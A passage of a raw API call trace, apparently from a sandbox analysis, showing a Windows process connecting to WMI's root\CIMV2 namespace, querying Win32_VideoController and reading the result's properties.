puBuffLength=0x36f268*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0214.491] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768ba8, puCount=0x36f258 | out: puCount=0x36f258*=0x2) returned 0x0 [0214.491] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=4, puBuffLength=0x36f254*=0x0, pszText=0x0 | out: puBuffLength=0x36f254*=0xf, pszText=0x0) returned 0x0 [0214.491] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=4, puBuffLength=0x36f254*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f254*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0214.491] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1e8 | out: ppv=0x36f1e8*=0x6ee4bc) returned 0x0 [0214.492] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1e0 | out: pAptType=0x36f1e0*=1) returned 0x0 [0214.492] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1e4 | out: ppvObject=0x36f1e4*=0x0) returned 0x80004002 [0214.492] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0214.493] CoGetClassObject (in: rclsid=0x761b14*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ee08 | out: ppv=0x36ee08*=0x787bc0) returned 0x0 [0214.541] WbemLocator:IUnknown:QueryInterface (in: This=0x787bc0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36f020 | out: ppvObject=0x36f020*=0x0) returned 0x80004002 [0214.541] WbemLocator:IClassFactory:CreateInstance (in: This=0x787bc0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f02c | out: ppvObject=0x36f02c*=0x5e890b0) returned 0x0 [0214.541] WbemLocator:IUnknown:Release (This=0x787bc0) returned 0x0 [0214.542] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890b0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ec4c | out: ppvObject=0x36ec4c*=0x5e890b0) returned 0x0 [0214.542] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890b0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36ec00 | out: ppvObject=0x36ec00*=0x0) returned 0x80004002 [0214.542] WbemLocator:IUnknown:AddRef (This=0x5e890b0) returned 0x3 [0214.542] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890b0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e55c | out: ppvObject=0x36e55c*=0x0) returned 0x80004002 [0214.542] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890b0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e50c | out: ppvObject=0x36e50c*=0x0) returned 0x80004002 [0214.542] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890b0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e518 | out: ppvObject=0x36e518*=0x0) returned 0x80004002 [0214.542] CoGetContextToken (in: pToken=0x36e578 | out: pToken=0x36e578) returned 0x0 [0214.542] CoGetContextToken (in: pToken=0x36e98c | out: pToken=0x36e98c) returned 0x0 [0214.542] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890b0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea0c | out: ppvObject=0x36ea0c*=0x0) returned 0x80004002 [0214.543] WbemLocator:IUnknown:Release (This=0x5e890b0) returned 0x2 [0214.543] WbemLocator:IUnknown:Release (This=0x5e890b0) returned 0x1 [0214.543] CoGetContextToken (in: pToken=0x36f004 | out: pToken=0x36f004) returned 0x0 [0214.543] CoGetContextToken (in: pToken=0x36ef64 | out: pToken=0x36ef64) returned 0x0 [0214.543] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890b0, riid=0x36f034*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36f030 | out: ppvObject=0x36f030*=0x5e890b0) returned 0x0 [0214.543] WbemLocator:IUnknown:AddRef (This=0x5e890b0) returned 0x3 [0214.543] WbemLocator:IUnknown:Release (This=0x5e890b0) returned 0x2 [0214.543] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768ba8, puCount=0x36f1c4 | out: puCount=0x36f1c4*=0x2) returned 0x0 [0214.543] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=8, puBuffLength=0x36f1c0*=0x0, pszText=0x0 | out: puBuffLength=0x36f1c0*=0xf, pszText=0x0) returned 0x0 [0214.543] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=8, puBuffLength=0x36f1c0*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1c0*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0214.543] CoCreateInstance (in: rclsid=0x727c3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x727c3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x36f070 | out: ppv=0x36f070*=0x5e890c0) returned 0x0 [0214.544] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5e890c0, strNetworkResource="\\\\.\\root\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x36f110 | out: ppNamespace=0x36f110*=0x792ab8) returned 0x0 [0214.654] WbemLocator:IUnknown:QueryInterface (in: This=0x792ab8, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef94 | out: ppvObject=0x36ef94*=0x784c14) returned 0x0 [0214.654] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x784c14, pProxy=0x792ab8, pAuthnSvc=0x36efe4, pAuthzSvc=0x36efe0, pServerPrincName=0x36efd8, pAuthnLevel=0x36efdc, pImpLevel=0x36efcc, pAuthInfo=0x36efd0, pCapabilites=0x36efd4 | out: pAuthnSvc=0x36efe4*=0xa, pAuthzSvc=0x36efe0*=0x0, pServerPrincName=0x36efd8, pAuthnLevel=0x36efdc*=0x6, pImpLevel=0x36efcc*=0x2, pAuthInfo=0x36efd0, pCapabilites=0x36efd4*=0x1) returned 0x0 [0214.655] WbemLocator:IUnknown:Release (This=0x784c14) returned 0x1 [0214.655] WbemLocator:IUnknown:QueryInterface (in: This=0x792ab8, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef88 | out: ppvObject=0x36ef88*=0x784c34) returned 0x0 [0214.655] WbemLocator:IUnknown:QueryInterface (in: This=0x792ab8, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef74 | out: ppvObject=0x36ef74*=0x784c14) returned 0x0 [0214.655] WbemLocator:IClientSecurity:SetBlanket (This=0x784c14, pProxy=0x792ab8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0214.655] WbemLocator:IUnknown:Release (This=0x784c14) returned 0x2 [0214.655] WbemLocator:IUnknown:Release (This=0x784c34) returned 0x1 [0214.655] CoTaskMemFree (pv=0x793eb8) [0214.655] WbemLocator:IUnknown:AddRef (This=0x792ab8) returned 0x2 [0214.656] WbemLocator:IUnknown:Release (This=0x5e890c0) returned 0x0 [0214.656] CoGetContextToken (in: pToken=0x36e4c8 | out: pToken=0x36e4c8) returned 0x0 [0214.656] CoGetContextToken (in: pToken=0x36e8dc | out: pToken=0x36e8dc) returned 0x0 [0214.656] WbemLocator:IUnknown:QueryInterface (in: This=0x792ab8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e874 | out: ppvObject=0x36e874*=0x784c1c) returned 0x0 [0214.656] WbemLocator:IRpcOptions:Query (in: This=0x784c1c, pPrx=0x787d58, dwProperty=2, pdwValue=0x36e968 | out: pdwValue=0x36e968) returned 0x80004002 [0214.657] WbemLocator:IUnknown:Release (This=0x784c1c) returned 0x2 [0214.657] CoGetContextToken (in: pToken=0x36eeac | out: pToken=0x36eeac) returned 0x0 [0214.657] CoGetContextToken (in: pToken=0x36ee0c | out: pToken=0x36ee0c) returned 0x0 [0214.657] WbemLocator:IUnknown:QueryInterface (in: This=0x792ab8, riid=0x36eedc*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x36eda8 | out: ppvObject=0x36eda8*=0x792ab8) returned 0x0 [0214.657] WbemLocator:IUnknown:Release (This=0x792ab8) returned 0x2 [0214.657] SysStringLen (param_1=0x0) returned 0x0 [0214.657] CoGetContextToken (in: pToken=0x36efbc | out: pToken=0x36efbc) returned 0x0 [0214.657] IWbemServices:ExecQuery (in: This=0x792ab8, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_VideoController", lFlags=16, pCtx=0x0, ppEnum=0x36f1d0 | out: ppEnum=0x36f1d0*=0x70f928) returned 0x0 [0214.674] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f020 | out: ppvObject=0x36f020*=0x70f92c) returned 0x0 [0214.674] IClientSecurity:QueryBlanket (in: This=0x70f92c, pProxy=0x70f928, pAuthnSvc=0x36f070, pAuthzSvc=0x36f06c, pServerPrincName=0x36f064, pAuthnLevel=0x36f068, pImpLevel=0x36f058, pAuthInfo=0x36f05c, pCapabilites=0x36f060 | out: pAuthnSvc=0x36f070*=0xa, pAuthzSvc=0x36f06c*=0x0, pServerPrincName=0x36f064, pAuthnLevel=0x36f068*=0x6, pImpLevel=0x36f058*=0x2, pAuthInfo=0x36f05c, pCapabilites=0x36f060*=0x1) returned 0x0 [0214.674] IUnknown:Release (This=0x70f92c) returned 0x1 [0214.674] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f014 | out: ppvObject=0x36f014*=0x784a54) returned 0x0 [0214.674] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f000 | out: ppvObject=0x36f000*=0x70f92c) returned 0x0 [0214.674] IClientSecurity:SetBlanket (This=0x70f92c, pProxy=0x70f928, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0214.676] IUnknown:Release (This=0x70f92c) returned 0x2 [0214.677] WbemLocator:IUnknown:Release (This=0x784a54) returned 0x1 [0214.677] CoTaskMemFree (pv=0x793e58) [0214.677] IUnknown:AddRef (This=0x70f928) returned 0x2 [0214.677] CoGetContextToken (in: pToken=0x36e540 | out: pToken=0x36e540) returned 0x0 [0214.677] CoGetContextToken (in: pToken=0x36e954 | out: pToken=0x36e954) returned 0x0 [0214.678] IUnknown:QueryInterface (in: This=0x70f928, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e8ec | out: ppvObject=0x36e8ec*=0x784a3c) returned 0x0 [0214.678] WbemLocator:IRpcOptions:Query (in: This=0x784a3c, pPrx=0x787d40, dwProperty=2, pdwValue=0x36e9e0 | out: pdwValue=0x36e9e0) returned 0x80004002 [0214.678] WbemLocator:IUnknown:Release (This=0x784a3c) returned 0x2 [0214.678] CoGetContextToken (in: pToken=0x36ef24 | out: pToken=0x36ef24) returned 0x0 [0214.678] CoGetContextToken (in: pToken=0x36ee84 | out: pToken=0x36ee84) returned 0x0 [0214.678] IUnknown:QueryInterface (in: This=0x70f928, riid=0x36ef54*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ee20 | out: ppvObject=0x36ee20*=0x70f928) returned 0x0 [0214.679] IUnknown:Release (This=0x70f928) returned 0x2 [0214.679] SysStringLen (param_1=0x0) returned 0x0 [0214.679] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768ba8, puCount=0x36f21c | out: puCount=0x36f21c*=0x2) returned 0x0 [0214.679] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=4, puBuffLength=0x36f218*=0x0, pszText=0x0 | out: puBuffLength=0x36f218*=0xf, pszText=0x0) returned 0x0 [0214.679] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=4, puBuffLength=0x36f218*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f218*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0214.679] CoGetContextToken (in: pToken=0x36f074 | out: pToken=0x36f074) returned 0x0 [0214.679] IEnumWbemClassObject:Clone (in: This=0x70f928, ppEnum=0x36f228 | out: ppEnum=0x36f228*=0x70f9f0) returned 0x0 [0214.681] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0e4 | out: ppvObject=0x36f0e4*=0x70f9f4) returned 0x0 [0214.681] IClientSecurity:QueryBlanket (in: This=0x70f9f4, pProxy=0x70f9f0, pAuthnSvc=0x36f134, pAuthzSvc=0x36f130, pServerPrincName=0x36f128, pAuthnLevel=0x36f12c, pImpLevel=0x36f11c, pAuthInfo=0x36f120, pCapabilites=0x36f124 | out: pAuthnSvc=0x36f134*=0xa, pAuthzSvc=0x36f130*=0x0, pServerPrincName=0x36f128, pAuthnLevel=0x36f12c*=0x6, pImpLevel=0x36f11c*=0x2, pAuthInfo=0x36f120, pCapabilites=0x36f124*=0x1) returned 0x0 [0214.681] IUnknown:Release (This=0x70f9f4) returned 0x1 [0214.681] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0d8 | out: ppvObject=0x36f0d8*=0x784e14) returned 0x0 [0214.681] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0c4 | out: ppvObject=0x36f0c4*=0x70f9f4) returned 0x0 [0214.681] IClientSecurity:SetBlanket (This=0x70f9f4, pProxy=0x70f9f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0214.683] IUnknown:Release (This=0x70f9f4) returned 0x2 [0214.683] WbemLocator:IUnknown:Release (This=0x784e14) returned 0x1 [0214.683] CoTaskMemFree (pv=0x793ee8) [0214.684] IUnknown:AddRef (This=0x70f9f0) returned 0x2 [0214.684] CoGetContextToken (in: pToken=0x36e5f4 | out: pToken=0x36e5f4) returned 0x0 [0214.684] CoGetContextToken (in: pToken=0x36ea04 | out: pToken=0x36ea04) returned 0x0 [0214.684] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9a0 | out: ppvObject=0x36e9a0*=0x784dfc) returned 0x0 [0214.684] WbemLocator:IRpcOptions:Query (in: This=0x784dfc, pPrx=0x787de8, dwProperty=2, pdwValue=0x36ea94 | out: pdwValue=0x36ea94) returned 0x80004002 [0214.685] WbemLocator:IUnknown:Release (This=0x784dfc) returned 0x2 [0214.685] CoGetContextToken (in: pToken=0x36efd4 | out: pToken=0x36efd4) returned 0x0 [0214.685] CoGetContextToken (in: pToken=0x36ef34 | out: pToken=0x36ef34) returned 0x0 [0214.685] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x36f004*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36eed0 | out: ppvObject=0x36eed0*=0x70f9f0) returned 0x0 [0214.685] IUnknown:Release (This=0x70f9f0) returned 0x2 [0214.685] SysStringLen (param_1=0x0) returned 0x0 [0214.685] IEnumWbemClassObject:Reset (This=0x70f9f0) returned 0x0 [0214.686] CoTaskMemAlloc (cb=0x4) returned 0x5e89130 [0214.686] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89130, puReturned=0x24518b0 | out: apObjects=0x5e89130*=0x5e88a80, puReturned=0x24518b0*=0x1) returned 0x0 [0214.696] IUnknown:QueryInterface (in: This=0x5e88a80, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e87c | out: ppvObject=0x36e87c*=0x5e88a80) returned 0x0 [0214.696] IUnknown:QueryInterface (in: This=0x5e88a80, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e830 | out: ppvObject=0x36e830*=0x0) returned 0x80004002 [0214.696] IUnknown:QueryInterface (in: This=0x5e88a80, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e658 | out: ppvObject=0x36e658*=0x0) returned 0x80004002 [0214.697] IUnknown:AddRef (This=0x5e88a80) returned 0x3 [0214.697] IUnknown:QueryInterface (in: This=0x5e88a80, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e18c | out: ppvObject=0x36e18c*=0x0) returned 0x80004002 [0214.697] IUnknown:QueryInterface (in: This=0x5e88a80, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e13c | out: ppvObject=0x36e13c*=0x0) returned 0x80004002 [0214.697] IUnknown:QueryInterface (in: This=0x5e88a80, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e148 | out: ppvObject=0x36e148*=0x5e88a84) returned 0x0 [0214.697] IMarshal:GetUnmarshalClass (in: This=0x5e88a84, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e150 | out: pCid=0x36e150*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.697] IUnknown:Release (This=0x5e88a84) returned 0x3 [0214.697] CoGetContextToken (in: pToken=0x36e1a8 | out: pToken=0x36e1a8) returned 0x0 [0214.697] CoGetContextToken (in: pToken=0x36e5bc | out: pToken=0x36e5bc) returned 0x0 [0214.697] IUnknown:QueryInterface (in: This=0x5e88a80, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e63c | out: ppvObject=0x36e63c*=0x0) returned 0x80004002 [0214.697] IUnknown:Release (This=0x5e88a80) returned 0x2 [0214.698] CoGetContextToken (in: pToken=0x36ebac | out: pToken=0x36ebac) returned 0x0 [0214.698] CoGetContextToken (in: pToken=0x36eb0c | out: pToken=0x36eb0c) returned 0x0 [0214.698] IUnknown:QueryInterface (in: This=0x5e88a80, riid=0x36ebdc*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36ebd8 | out: ppvObject=0x36ebd8*=0x5e88a80) returned 0x0 [0214.698] IUnknown:AddRef (This=0x5e88a80) returned 0x4 [0214.698] IUnknown:Release (This=0x5e88a80) returned 0x3 [0214.698] IUnknown:Release (This=0x5e88a80) returned 0x2 [0214.698] CoTaskMemFree (pv=0x5e89130) [0214.698] CoGetContextToken (in: pToken=0x36ef1c | out: pToken=0x36ef1c) returned 0x0 [0214.698] IUnknown:AddRef (This=0x5e88a80) returned 0x3 [0214.698] IWbemClassObject:Get (in: This=0x5e88a80, wszName="__GENUS", lFlags=0, pVal=0x36f218*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f298*=0, plFlavor=0x36f294*=0 | out: pVal=0x36f218*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f298*=3, plFlavor=0x36f294*=64) returned 0x0 [0214.699] IWbemClassObject:Get (in: This=0x5e88a80, wszName="__PATH", lFlags=0, pVal=0x36f1fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f280*=0, plFlavor=0x36f27c*=0 | out: pVal=0x36f1fc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x36f280*=8, plFlavor=0x36f27c*=64) returned 0x0 [0214.699] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x92 [0214.699] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x92 [0214.699] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f228 | out: ppv=0x36f228*=0x6ee4bc) returned 0x0 [0214.699] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f220 | out: pAptType=0x36f220*=1) returned 0x0 [0214.699] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f224 | out: ppvObject=0x36f224*=0x0) returned 0x80004002 [0214.699] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0214.700] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb90 | out: ppv=0x36eb90*=0x5e89130) returned 0x0 [0214.700] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89130, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36eda8 | out: ppvObject=0x36eda8*=0x0) returned 0x80004002 [0214.701] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89130, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36edb4 | out: ppvObject=0x36edb4*=0x768cf8) returned 0x0 [0214.701] WbemDefPath:IUnknown:Release (This=0x5e89130) returned 0x0 [0214.701] WbemDefPath:IUnknown:QueryInterface (in: This=0x768cf8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 